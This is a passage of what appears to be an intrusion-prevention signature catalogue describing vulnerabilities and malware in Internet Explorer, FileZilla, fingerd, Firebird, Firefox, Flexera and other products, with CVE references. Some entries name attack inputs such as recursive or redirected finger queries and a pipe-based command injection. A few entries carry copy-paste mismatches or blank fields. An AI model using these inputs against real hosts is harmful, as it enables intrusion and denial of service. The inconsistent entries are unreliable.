Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3914

References:

CVE-2013-3914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3914

MS13-088
http://technet.microsoft.com/security/bulletin/MS13-088

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3916

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-550-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3916

References:

CVE-2013-3916
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3916

MS13-088
http://technet.microsoft.com/security/bulletin/MS13-088

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3917

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-550-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3917

References:

CVE-2013-3917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3917

MS13-088
http://technet.microsoft.com/security/bulletin/MS13-088

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Invalid

About this vulnerability:	A vulnerability in Microsoft Internet Explorer
Risk:	High
First detected in:	sgpkg-ips-544-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0
Type:	Input Validation
Description:	There is a vulnerability in Microsoft Internet Explorer.

File-Text_Suspicious_Inline_Iframe_Element

About this vulnerability:	A suspicious iframe element detected
Risk:	Moderate
First detected in:	sgpkg-ips-1232-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Code Injection
Description:	An HTML file containing a suspicious iframe element has been detected.
Situation:	File-Text_Suspicious_Inline_Iframe_Element-1 File-Text_Suspicious_Inline_Iframe_Element-2

File-Type-Identification

About this vulnerability:	File type identification
Risk:	Low
First detected in:	sgpkg-ips-449-4219
Last changed:	sgpkg-ips-1408-5242
Platform:	Generic
Software:	Any Software
Type:	Insecure Configuration
Description:	File type identification for detecting/blocking download of different file types.
Situation:	Shared_Executable-File-Upload Shared_Executable-File-Download Shared_ELF-Executable-File-Download Shared_Microsoft-Cabinet-File-Download Shared_SS-XAR-Archive-Download Shared-UDP_Executable-File-Transfer E-Mail_BS-Executable-File-Transfer E-Mail_BS-Microsoft-OLE-Structured-Storage-File-Transfer E-Mail_BS-Zip-Archive-Transfer E-Mail_BS-Gzip-Compressed-File-Transfer FTP_DL-Executable-File-Download FTP_UL-Executable-File-Upload HTTP_SS-Apple-QuickTime-Media-Download HTTP_SS-Adobe-Flash-Media-Download HTTP_SS-ISO-MPEG-4-Download HTTP_SS-Microsoft-OLE-Structured-Storage-File-Download HTTP_SS-Zip-Archive-Download HTTP_SS-BZip2-Compressed-File-Download HTTP_SS-Gzip-Compressed-File-Download HTTP_SS-RIFF-WAVE-Download SMB-TCP_FR-Executable-File-Read SMB-TCP_FW-Executable-File-Write TFTP_CS-Executable-File-Upload TFTP_SS-Executable-File-Download File-Binary_Gzip-Compressed-File-Upload File-OLE_Microsoft-Structured-Storage-File File-OLE_Embedded-Zip-Archive File-OLE_Microsoft-Excel-95-Workbook File-OLE_Microsoft-PowerPoint-Presentation File-OLE_Null-Class-Id File-OLE_Unknown-Class-Id File-OLE_Microsoft-Word-Document File-OLE_Microsoft-Installer-Database File-OLE_Microsoft-Installer-Transform File-OLE_Microsoft-Installer-Patch File-OLE_Microsoft-PowerPoint-Slide File-OLE_Microsoft-Excel-Workbook File-OLE_Generic-OLE-Package File-OLE_Microsoft-Word-6-Document File-OLE_Adobe-Photoshop-7-Image File-OLE_Microsoft-Outlook-Message File-OLE_Microsoft-Equation-2.0-Document File-OLE_Microsoft-Equation-3.0-Document File-OLE_Microsoft-PowerPoint-95-Presentation File-OLE_Microsoft-PowerPoint-Add-In File-OLE_Microsoft-Visio-Drawing File-Flash_Adobe-Flash-Media-Transfer File-PDF_Embedded-Zip-Archive File-Zip_Archive-Detected File-Exe_Executable-File-Download File-Exe_Executable-File-Upload File-Binary_Google-Chrome-CRX-Extension-Package File-Exe_Executable-File-Transfer File-Binary_Gzip-Compressed-File-Download File-MPEG_Apple-QuickTime-Media File-Binary_Debian-Binary-Installation-Package File-Binary_Red-Hat-Binary-Installation-Package File-Binary_Microsoft-Word-For-Macintosh-Version-5-Document File-MPEG_ISO-MPEG-4-Download File-Binary_BZip2-Compressed-File-Download File-Binary_Windows-Media-HTTP-Stream File-Binary_Standard-MIDI-Download File-Binary_Mp3-Download File-RIFF_WAVE-Download File-Binary_Java-Class-File File-Zip_JAR-File-Detected File-Binary_Rar-File File-Binary_Windows-LNK-File-Transfer File-Binary_OneNote-Document File-Binary_Windows-Control-Panel-Applet-Shortcut-File-Transfer File-Binary_TIFF-File File-Binary_XAR-Archive File-Binary_Microsoft-Cabinet-Transfer File-Binary_ELF-Executable-File-Transfer File-Binary_Mach-O-Executable-File-Transfer File-Binary_Embedded-Zip-Archive File-Binary_LhArc-Archive File-Binary_Ar-Archive File-Binary_ARJ-Archive File-Binary_Microsoft-Windows-Compiled-Help File-Binary_ACE-Archive File-Binary_StuffIt-Archive File-Binary_Blizzard-MPQ-Archive File-Binary_Lz4-Archive File-Binary_Tar-Archive File-Binary_Matroska-Media-Container File-Binary_Apple-Dmg-Disk-Image File-Binary_Microsoft-Windows-Memory-Dump File-Binary_Raw-Disk-Image File-Binary_Romfs-Disk-Image File-Binary_VMware-Virtual-Disk-Image File-Binary_Oracle-VirtualBox-Virtual-Disk-Image File-Binary_Microsoft-Hyper-V-Disk-Image File-Binary_CD-ROM-Disk-Image File-Binary_Microsoft-Windows-Metafile File-Binary_Autodesk-Animation-Flic-Video File-Binary_Microsoft-ASF-Container File-Binary_Word-Perfect-Document File-Binary_Microsoft-Windows-Fax-Cover-Sheet File-Binary_RealMedia-Video File-Binary_RealNetworks-Internet-Video File-Binary_Lotus-1-2-3-Spreadsheet File-Binary_Microsoft-Excel-Legacy-Spreadsheet File-Binary_Microsoft-Word-Legacy-Document File-Binary_Autodesk-Autocad-DWG File-Binary_Autodesk-Autocad-FAS File-Binary_Autodesk-Autocad-DWF File-Binary_Microsoft-Windows-Help-Document File-JPEG_Embedded-Zip-Archive File-PNG_Embedded-Zip-Archive File-GIF_Embedded-Zip-Archive File-RTF_Embedded-Zip-Archive File-RIFF_Embedded-Zip-Archive File-RIFF_RIFFX-Download File-RIFF_4xm-Download File-RIFF_QLCM-Download File-RIFF_Corel-Draw-Image-Download File-RIFF_Ani-Download File-RIFF_AVI-Download File-RIFF_Download File-TextId_XML-File File-TextId_Microsoft-Excel-2002-XML-Document File-TextId_Microsoft-Word-2003-XML-Document File-TextId_Microsoft-Excel-2013-Workbook File-TextId_Office-Open-XML-Workbook File-TextId_Microsoft-Word-2010-Document File-TextId_Microsoft-Word-2013-Document File-TextId_Office-Open-XML-Document File-TextId_Embedded-Zip-Archive File-MPEG_Embedded-Zip-Archive File-Exe_Self-Extracting-Zip-Archive File-Exe_Self-Extracting-LhArc-Archive File-Exe_MS-DOS-Executable File-Exe_New-Executable File-Exe_Linear-Executable-LX File-Exe_Linear-Executable-LE File-Exe_Portable-Executable

FileZilla-FTP-Server-Denial-of-Service

About this vulnerability:

A FileZilla FTP Server Denial of Service vulnerability.

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

FileZilla FTP Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in FileZilla FTP Server, version 0.9.4d, which allows remote attackers to cause a denial of service condition via a long USER ftp command.

Situation:

FTP_CS-FileZilla-FTP-Server-Denial-of-Service

References:

CVE-2005-3589
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3589

BID-15346
http://www.securityfocus.com/bid/15346

OSVDB-20817
http://www.osvdb.org/20817

FinalDraft-C2-Activity

About this vulnerability:	FinalDraft command-and-control traffic detected
Risk:	High
First detected in:	sgpkg-ips-1838-5242
Last changed:	sgpkg-ips-1838-5242
Platform:	Generic
Software:	FinalDraft
Type:	Backdoor
Description:	FinalDraft is a 64-bit malware written in C++ that focuses on data exfiltration and process injection. It leverages Microsoft Outlook as a communication channel via the Microsoft Graph API.
Situation:	Generic_SS-FinalDraft-C2-Activity HTTP_CSU-FinalDraft-C2-Activity

Finfisher-Spyware

About this vulnerability:	FinFisher Spyware
Risk:	High
First detected in:	sgpkg-ips-622-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Misconfiguration
Description:	FinFisher, also known as FinSpy, is a spyware tool. It is widely used by governments around the world to gather sensitive information.
Situation:	Generic_CS-Finfisher-Spyware-Traffic

Finger-0-Query-User-Name-Disclosure

About this vulnerability:

Userlist disclosure in fingerd

Risk:

Low

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

fingerd

Type:

Metacharacter Injection

Description:

Certain fingered implementations allow a malicious user to retrieve list of user accounts by querying for user "0".

Situation:

Finger_0-Query

References:

CVE-1999-0197
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0197

Finger-Bomb-DoS

About this vulnerability:

Remote DoS in fingerd

Risk:

Low

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

fingerd

Type:

Resource Starvation

Description:

Various fingerd implementations are vulnerable to recursive fingering (such as finger user@@@....@@@host), which starves target systems resources, as the finger recursively calls itself.

Situation:

Finger_Fingerd-Bomb

References:

CVE-1999-0106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0106

Finger-Cfingerd-User-Accounts-Disclosure

About this vulnerability:

Certain versions of cfingerd can be queried to list all the valid users on the target system

Risk:

Low

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

cfingerd

Type:

Malfunction

Description:

Certain versions of cfingerd can be queried to list all the valid users on the target system.

Situation:

Finger_Cfingerd-User-Accounts-Disclosure

References:

CVE-1999-0259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0259

Finger-Command-Execution

About this vulnerability:

Arbitrary command execution via finger

Risk:

High

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

fingerd

Type:

Malfunction

Description:

There are versions of the finger daemon that allow remote attackers to execute arbitrary commands on a host with the privileges of the user running the daemon. The vulnerability can be exploited by a pipe character in the finger request.

Situation:

Finger_Command-Execution

References:

CVE-1999-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0150

Finger-Dot-User-Name-Disclosure

About this vulnerability:

finger .@host returns names of accounts never logged into

Risk:

Low

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

fingerd

Type:

Malfunction

Description:

Some versions of the finger service return a list of users who have never logged in when queried with .@target.host. Remote attackers can exploit this feature to find accounts that may have easily guessed default password.

Situation:

Finger_Dot-User-Name-Disclosure

References:

CVE-1999-0198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0198

Finger-Redirection-Information-Disclosure

About this vulnerability:

Information disclosure in fingerd

Risk:

Low

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

fingerd

Type:

Metacharacter Injection

Description:

Some fingerd implementations allow redirecting finger request using the form user@host1@host2. This technique allows an attacker to conceal his presence, or to retrieve information through poorly-configured firewalls.

Situation:

Finger_Request-Redirection-Attempt

References:

CVE-1999-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0105

Fingerprint-Test

About this vulnerability:	Internal fingerprint test
Risk:	Low
First detected in:	sgpkg-ips-799-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Online Game
Description:	This vulnerability is used for internal fingerprint tests.
Situation:	CCSO_Fingerprint-Test-1 CCSO_Fingerprint-Test-8 CCSO_Fingerprint-Test-5 CCSO_Fingerprint-Test-6 CCSO_Fingerprint-Test-4 CCSO_Fingerprint-Test-2 CCSO_Fingerprint-Test-7 CCSO_Fingerprint-Test-3 CCSO_Fingerprint-Test-9 CCSO_Fingerprint-Test-11 CCSO_Fingerprint-Test-10

Firebird-Database-Server-Username-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Firebird Database Server

Risk:

High

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Firebird Database Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Firebird database server product. The flaw is due to a boundary error when handling excessively long username strings in received messages. A remote unauthenticated attacker may exploit this vulnerability by sending crafted messages to the target server. Successful attack may allow for arbitrary code injection and execution with privileges of the affected service.

Situation:

Generic_CS-Firebird-Database-Server-Username-Handling-Buffer-Overflow

References:

CVE-2008-0467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0467

BID-27467
http://www.securityfocus.com/bid/27467

Firebird-SQL-CNCT-Group-Number-BOF

About this vulnerability:

A vulnerability in Firebird SQL Server

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Firebird SQL

Type:

Buffer Overflow

Description:

A crafted packet to Firebird SQL GDSDB remote control protocol can be used to overwrite a return address pointer, allowing the attacker to execute arbitrary code.

Situation:

Generic_CS-Firebird-SQL-CNCT-Group-Number-BOF-2
Generic_CS-Firebird-SQL-CNCT-Group-Number-BOF-1

References:

CVE-2013-2492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2492

OSVDB-91044
http://www.osvdb.org/91044

Firebird-SQL-op-connect-request-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Firebird SQL

Risk:

Moderate

First detected in:

sgpkg-ips-238-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Firebird Database Server

Type:

Malfunction

Description:

There is a denial of service vulnerability in the Firebird SQL. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted op_connect_request message to the target server. A successful attack leads to a denial of service condition.

Situation:

Generic_Firebird-SQL-op-connect-request-Denial-Of-Service

References:

CVE-2009-2620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2620

BID-35842
http://www.securityfocus.com/bid/35842

OSVDB-56606
http://www.osvdb.org/56606

Firebird-Xdr-Operation-Request-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Firebird database server

Risk:

Moderate

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Firebird Database Server

Type:

Malfunction

Description:

There is a null-dereference overflow vulnerability in Firebird database server. The flaw resides in the External Data Representation (XDR) protocol processing routines. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted message to the target server. Successful attack could create a denial of service condition in the Firebird service.

Situation:

Generic_CS-Firebird-Xdr-Operation-Request-Handling-Denial-Of-Service

References:

CVE-2008-0387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0387

BID-27403
http://www.securityfocus.com/bid/27403

FireEye-Red-Team-Tools

About this vulnerability:	Tools associated with FireEye's Red Team
Risk:	High
First detected in:	sgpkg-ips-1304-5242
Last changed:	sgpkg-ips-1337-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	FireEye's Red Team penetration test toolset situations. These include variations of open source tools.
Situation:	SMB-TCP_FireEye-Red-Team-Tool-IMPACKETOBF-Smbexec File-Exe_FireEye-Red-Team-Tools-TypelibGUID

Firefox-Browser-XUL-Frame-Tree-Validation-Vulnerability

About this vulnerability:

Insufficent validation of Frame Tree Parameters may cause memory corruption

Risk:

High

First detected in:

sgpkg-ips-196-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Buffer Overflow

Description:

There exists vulnerability in Mozilla Firefox. The vulnerability is due to insufficient validation when handling XUL frame tree. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged on user.

Situation:

HTTP_SS-Firefox-Browser-XUL-Frame-Tree-Memory-Corruption
File-TextId_Firefox-Browser-XUL-Frame-Tree-Memory-Corruption

References:

CVE-2008-5016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5016

BID-32281
http://www.securityfocus.com/bid/32281

Firefox-clipPath-SVG-Stroke-Width-Memory-Corruption

About this vulnerability:

Mozilla Firefox clipPath SVG stroke-width Memory Corruption

Risk:

Moderate

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey

Type:

Insecure Configuration

Description:

A large stroke-width attribute in the clipPath element in an SVG file may cause memory corruption in some Firefox based browsers.

Situation:

File-TextId_Firefox-clipPath-SVG-Stroke-Width-Memory-Corruption

References:

CVE-2007-0776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776

BID-22964
http://www.securityfocus.com/bid/22964

OSVDB-32113
http://www.osvdb.org/32113

Firefox-Cookie-Site-Bondary-Bypass

About this vulnerability:

There is a site boundary bypass vulnerbility in Mozilla Firefox

Risk:

Low

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a site boundary bypass vulnerability in Mozilla Firefox, which allows a script to access cookies that belong to another domain, leading to information disclosure.

Situation:

HTTP_Firefox-Cookie-Site-Bondary-Bypass
File-Text_Firefox-Cookie-Site-Bondary-Bypass

References:

CVE-2007-0981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981

BID-22566
http://www.securityfocus.com/bid/22566

OSVDB-32104
http://www.osvdb.org/32104

Firefox-JavaScript-Engine-Memory-Corruption

About this vulnerability:

Memory Corruption vulnerability in Mozilla Firefox based browsers

Risk:

Moderate

First detected in:

sgpkg-ips-585-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Insecure Configuration

Description:

There exists an integer overflow condition in some versions of Mozilla Firefox based browsers. By invoking javascript toSource() -function, an attacker can cause a memory corruption in the target computer.

Situation:

File-Text_Firefox-JavaScript-Engine-Memory-Corruption

References:

CVE-2006-3806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3806

BID-19181
http://www.securityfocus.com/bid/19181

OSVDB-27570
http://www.osvdb.org/27570

Firefox-MCallGetProperty-Write-Side-Effects-Use-After-Free-Exploit

About this vulnerability:

A vulnerability in Firefox.

Risk:

High

First detected in:

sgpkg-ips-1446-5242

Last changed:

sgpkg-ips-1446-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Use-after-free

Description:

A vulnerability in Firefox, including versions of Firefox < 82.0.3, Firefox ESR < 78.4.1, and Thunderbird < 78.4.2, which allows remote attackers to execute arbitrary code by creating a use-after-free condition by emitting the MCallGetProperty opcode.

Situation:

File-Text_Firefox-MCallGetProperty-Write-Side-Effects-Use-After-Free-Exploit

References:

CVE-2020-26950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26950

Firefox-Plugin-Finder-JavaScript-Injection

About this vulnerability:

A javascript injection vulnerability in Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Misconfiguration

Description:

There is a vulnerability in Firefox, which allows remote attackers to execute arbitrary code via a javascript: URL in the PLUGINSPAGE attribute of an EMBED tag.

Situation:

File-Text_Firefox-Plugin-Finder-JavaScript-Injection

References:

CVE-2005-0752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0752

BID-13228
http://www.securityfocus.com/bid/13228

Firefox-Privileged-JavaScript-Injection

About this vulnerability:

A Firefox Privileged Javascript Injection vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-740-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Javascript Injection

Description:

A vulnerability in Mozilla Firefox, versions 35 through 36, which allows remote attackers to execute arbitrary JavaScript code by leveraging the ability to bypass the Same Origin Policy.

Situation:

File-Text_Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation

References:

CVE-2015-0816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0816

Firefox-SVG-JavaScript-Zoom-Memory-Corruption

About this vulnerability:

Javascript scaling function in embedded SVG image

Risk:

Moderate

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey

Type:

Insecure Configuration

Description:

A large stroke-width attribute in the clipPath element in an SVG file may cause memory corruption in some Firefox based browsers.

Situation:

File-TextId_Firefox-SVG-JavaScript-Zoom-Memory-Corruption
File-Text_Firefox-SVG-JavaScript-Zoom-Memory-Corruption

References:

CVE-2007-2867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2867

BID-24242
http://www.securityfocus.com/bid/24242

OSVDB-35134
http://www.osvdb.org/35134

Firefox-WYCIWYG-Cache-Manipulation

About this vulnerability:

WYCIWYG protocol vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-585-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey

Type:

Cross-site Scripting

Description:

A vulnerability exists in Mozilla Firefox based browsers, allowing attacker to manipulate and read browser cache via malicious redirect with Mozilla WYCIWYG protocol.

Situation:

File-Text_Firefox-WYCIWYG-Cache-Manipulation

References:

CVE-2007-3656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3656

BID-24831
http://www.securityfocus.com/bid/24831

OSVDB-16396
http://www.osvdb.org/16396

Fishbowl-Inventory-Fishbowl-Server-decodeObject-Insecure-Deserialization

About this vulnerability:

A vulnerability in Fishbowl Server.

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Linux; Windows; Mac OS X

Software:

Fishbowl Server

Type:

Input Validation

Description:

A vulnerability in Fishbowl Server, versions prior to prior to 2022.4.1, which allows remote attacker to execute arbitrary code by sending a crafted request, due to improper input validation before deserialization.

Situation:

Generic_CS-Fishbowl-Inventory-Fishbowl-Server-decodeObject-Insecure-Deserialization

References:

CVE-2022-29805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29805

Fivetoon

About this vulnerability:	Fivetoon
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Fivetoon is a Botnet responsible for sending spam.
Situation:	HTTP_CS-Fivetoon-Activity

Flac-Project-Libflac-Picture-Metadata-Mime-Type-Size-Buffer-Overflow

About this vulnerability:

A vulnerability in FLAC Project libFLAC

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libflac

Type:

Buffer Overflow

Description:

A heap memory overflow vulnerability exists in FLAC library embedded and used by various products. The vulnerability is due to boundary errors when processing Free Lossless Audio Codec (FLAC) audio files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted FLAC audio file. Successful exploitation may lead to arbitrary code execution in the security context of the affected application, normally using the privileges of the logged in user. In a attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the application that processes the malicious FLAC file will terminate abnormally.

Situation:

File-Binary_Flac-Project-Libflac-Picture-Metadata-Mime-Type-Size-Buffer-Overflow

References:

CVE-2007-4619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4619

BID-26042
http://www.securityfocus.com/bid/26042

Flac-Project-Libflac-Vorbis-Comment-String-Size-Buffer-Overflow

About this vulnerability:

A vulnerability in FLAC Project libFLAC

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libflac

Type:

Buffer Overflow

Description:

Situation:

File-Binary_Flac-Project-Libflac-Vorbis-Comment-String-Size-Buffer-Overflow

References:

CVE-2007-4619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4619

BID-26042
http://www.securityfocus.com/bid/26042

Flame-Skywiper-Malware

About this vulnerability:	Flame/Skywiper malware
Risk:	High
First detected in:	sgpkg-ips-456-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Flame aka Skywiper is a piece of malware targeted for Windows hosts. It is capable of collecting various pieces of information from the target system and sending it to a C&C server.
Situation:	HTTP_CRL-Flame-Skywiper-Possible-POST-Request-To-CnC

Flarum-Core-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Flarum

Risk:

Moderate

First detected in:

sgpkg-ips-1382-5242

Last changed:

sgpkg-ips-1382-5242

Platform:

Generic

Software:

Flarum

Type:

Input Validation

Description:

Insufficient sanitization of HTML Markup in Flarum's translation library causes a cross-site scripting vulnerability that can be exploited to execute arbitrary scripts in a user's browser.

Situation:

File-Text_Flarum-Core-Cross-Site-Scripting
HTTP_CRL-Flarum-Core-Cross-Site-Scripting

References:

CVE-2021-32671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32671

Flash-Embedded-Office-Document

About this vulnerability:	Flash embedded office document was detected
Risk:	High
First detected in:	sgpkg-ips-1075-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A flash embedded office document file was detected. Embedded flash files can be used to exploit vulnerabilities in Adobe Flash to compromise the target system.
Situation:	File-TextId_Flash-Embedded-Office-Document

FlashGet-FTP-Pwd-Command-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in FlashGet

Risk:

Moderate

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FlashGet

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in FlashGet.

Situation:

FTP_SS-FlashGet-FTP-Pwd-Command-Stack-Buffer-Overflow

References:

BID-30685
http://www.securityfocus.com/bid/30685

FlexDotnetCMS-Arbitrary-Asp-File-Upload

About this vulnerability:

A vulnerability in FlexDotnetCMS.

Risk:

High

First detected in:

sgpkg-ips-1359-5242

Last changed:

sgpkg-ips-1359-5242

Platform:

Windows

Software:

FlexDotnetCMS

Type:

Input Validation

Description:

A vulnerability in FlexDotnetCMS, versions 1.5.8 and before, which allows remote attackers to upload arbitrary text files and rename them on the system as ASP while adding and executing a payload.

Situation:

HTTP_CRL-FlexDotnetCMS-Arbitrary-Asp-File-Upload

References:

CVE-2020-27386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27386

Flexense-DiskPulse-Stack-Buffer-Overflow

About this vulnerability:	Flexense DiskPulse Stack Buffer Overflow
Risk:	High
First detected in:	sgpkg-ips-1320-5242
Last changed:	sgpkg-ips-1320-5242
Platform:	Generic
Software:	Flexense DiskPulse
Type:	Malfunction
Description:	There exists a stack buffer overflow vulnerability in Flexense DiskPulse.
Situation:	File-TextId_Flexense-DiskPulse-Stack-Buffer-Overflow

Flexense-Vx-Search-Enterprise-Add_Command-Buffer-Overflow

About this vulnerability:	A vulnerability in Flexense VX Search Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-1028-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Flexense VX Search Enterprise
Type:	Buffer Overflow
Description:	An improper bounds check on request data causes a buffer overflow vulnerability in Flexense VX Search Enterprise. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	HTTP_CRL-Flexense-Vx-Search-Enterprise-Add_Command-Buffer-Overflow

Flexera-Flexnet-Publisher-License-Server-Buffer-Overflow

About this vulnerability:

A Flexera FlexNet Publisher License Server Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Flexera FlexNet

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Flexera FlexNet which allows remote attackers to execute arbitrary code by sending a specially crafted request to the vulnerable service.

Situation:

Generic_CS-Flexera-Flexnet-Publisher-License-Server-Buffer-Overflow

References:

CVE-2015-8277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8277

Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Flexera FlexNet Publisher

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Flexera FlexNet

Type:

Buffer Overflow

